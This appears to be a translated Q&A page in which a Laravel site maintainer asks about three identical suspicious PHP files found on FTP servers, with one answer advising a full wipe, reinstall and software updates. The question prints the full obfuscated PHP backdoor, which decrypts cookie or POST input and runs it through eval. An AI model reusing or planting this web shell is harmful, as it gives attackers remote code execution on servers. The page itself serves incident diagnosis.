看起来很可疑的文件突然出现在FTP服务器上

时间:2018-05-03 15:01:30

标签: php laravel ftp

对于客户,我正在维护一小组使用PHP Laravel构建的网站。最近在研究这些时,我发现了一些新的可疑文件,这些文件突然出现在两个FTP服务器网站上。这些文件最初不是代码库的一部分,我不知道它们突然来自哪里。共有三个文件,名为b3lo5x3x.phpcache.phpplugin.php,它们位于网站的根目录中。

文件的内容看起来非常令人不安。在unphp.net上解码时,我得到以下结果,这对于所有三个文件都是完全相同的。这三个文件的大小也是一样的。

<?php
$hguenpg = '8v7n\'kadeH62ycg_ti9pm1-fsb0#rxlu4*o';
$fvgiv = Array();
$fvgiv[] = $hguenpg[18] . $hguenpg[11] . $hguenpg[0] . $hguenpg[0] . $hguenpg[26] . $hguenpg[11] . $hguenpg[21] . $hguenpg[0] . $hguenpg[22] . $hguenpg[10] . $hguenpg[7] . $hguenpg[13] . $hguenpg[11] . $hguenpg[22] . $hguenpg[32] . $hguenpg[6] . $hguenpg[23] . $hguenpg[8] . $hguenpg[22] . $hguenpg[0] . $hguenpg[32] . $hguenpg[6] . $hguenpg[25] . $hguenpg[22] . $hguenpg[13] . $hguenpg[32] . $hguenpg[7] . $hguenpg[21] . $hguenpg[18] . $hguenpg[11] . $hguenpg[25] . $hguenpg[2] . $hguenpg[7] . $hguenpg[0] . $hguenpg[23] . $hguenpg[2];
$fvgiv[] = $hguenpg[9] . $hguenpg[33];
$fvgiv[] = $hguenpg[27];
$fvgiv[] = $hguenpg[13] . $hguenpg[34] . $hguenpg[31] . $hguenpg[3] . $hguenpg[16];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[15] . $hguenpg[28] . $hguenpg[8] . $hguenpg[19] . $hguenpg[8] . $hguenpg[6] . $hguenpg[16];
$fvgiv[] = $hguenpg[8] . $hguenpg[29] . $hguenpg[19] . $hguenpg[30] . $hguenpg[34] . $hguenpg[7] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[31] . $hguenpg[25] . $hguenpg[24] . $hguenpg[16] . $hguenpg[28];
$fvgiv[] = $hguenpg[6] . $hguenpg[28] . $hguenpg[28] . $hguenpg[6] . $hguenpg[12] . $hguenpg[15] . $hguenpg[20] . $hguenpg[8] . $hguenpg[28] . $hguenpg[14] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[30] . $hguenpg[8] . $hguenpg[3];
$fvgiv[] = $hguenpg[19] . $hguenpg[6] . $hguenpg[13] . $hguenpg[5];
foreach ($fvgiv[7]($_COOKIE, $_POST) as $lfpfzw => $wqudv) {
    function dgubnv($fvgiv, $lfpfzw, $nclll) {
        return $fvgiv[6]($fvgiv[4]($lfpfzw . $fvgiv[0], ($nclll / $fvgiv[8]($lfpfzw)) + 1), 0, $nclll);
    }
    function oocfo($fvgiv, $elasr) {
        return @$fvgiv[9]($fvgiv[1], $elasr);
    }
    function yiugt($fvgiv, $elasr) {
        $vezpr = $fvgiv[3]($elasr) % 3;
        if (!$vezpr) {
            eval($elasr[1]($elasr[2]));
            exit();
        }
    }
    $wqudv = oocfo($fvgiv, $wqudv);
    yiugt($fvgiv, $fvgiv[5]($fvgiv[2], $wqudv ^ dgubnv($fvgiv, $lfpfzw, $fvgiv[8]($wqudv))));
} ?>

有谁知道这可能是什么?可能是FTP服务器感染了某种恶意软件或黑客工具吗?

1 个答案:

答案 0 :(得分:1)

完全擦拭受影响的机器。您需要将Laravel项目重新安装到新的清洁机器上。如果可能,您还应审核它们和使用的任何其他软件。

确保服务器上的所有软件都已更新。最有可能的是,您通过具有已知漏洞的非更新软件遭到入侵。

相关问题
最新问题